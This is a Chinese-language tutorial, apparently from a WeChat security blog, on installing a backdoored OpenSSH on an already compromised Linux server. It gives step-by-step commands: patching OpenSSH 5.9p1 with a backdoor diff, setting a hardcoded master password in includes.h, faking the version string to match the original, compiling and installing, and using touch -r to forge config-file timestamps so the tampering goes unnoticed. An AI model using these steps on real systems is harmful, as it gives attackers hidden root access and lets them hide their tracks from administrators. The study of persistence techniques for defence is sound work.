权限维持之SSH后门安装

0x00 前言

虽然可以ssh连进去，但是可否长期进行控制呢？这里就涉及到ssh后门的问题了，本次就是通过WinSCP与Linux服务器进行连接，然后配置安装SSH后门，这次实验主要目的通过实践学习熟悉Linux SSH后门的安装过程和步骤。

0x01 配置SSH后门

2.1：建立连接

利用winSCP工具（也可以选用其他工具）连接已知（即已经渗透成功的服务器）服务器，如图：

连接成功后：

用SecureCRT连接成功后如图：

通过ssh -V查看当前SSH版本

上传带有后门的SSH安装包

上传工具（上面提到的WinSCP、SecureCRT、putty都可以，自行选择）

解压上传的安装包

tar zxf openssh-5.9p1.tar.gztar zxf 0x06-openssh-5.9p1.patch.tar.gz

执行如下命令，移动原有配置文件

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.oldmv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

复制文件sshbd5.9p1.diff到openssh-5.9p1目录

cd openssh-5.9p1.patch/cp sshbd5.9p1.diff …/openssh-5.9p1cd …/openssh-5.9p1patch < sshbd5.9p1.diff

编辑includes.h文件，设置自己的后门密码

vi includes.h

找到#define SECRETPW “apaajaboleh” // apaajaboleh为后门的密码 可修改成自己设定的密码，如图

修改当前系统的SSH版本

通过ssh -V查看当前SSH版本，记录下来

vi version.h 修改version.h文件的版本信息

0x02 安装SSH后门

执行./configure --prefix=/usr --sysconfdir=/etc/ssh指定配置选项

执行make && make install 编译安装

安转完成后如图：

touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config //修改日期touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config //修改日期/etc/init.d/ssh restart //重启ssh服务

0x03 测试后门是否安装成功

用连接工具连接ssh，用户名为root，密码为前面设置的SSH后门的密码

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的

本文始发于微信公众号（无害实验室sec）：权限维持之SSH后门安装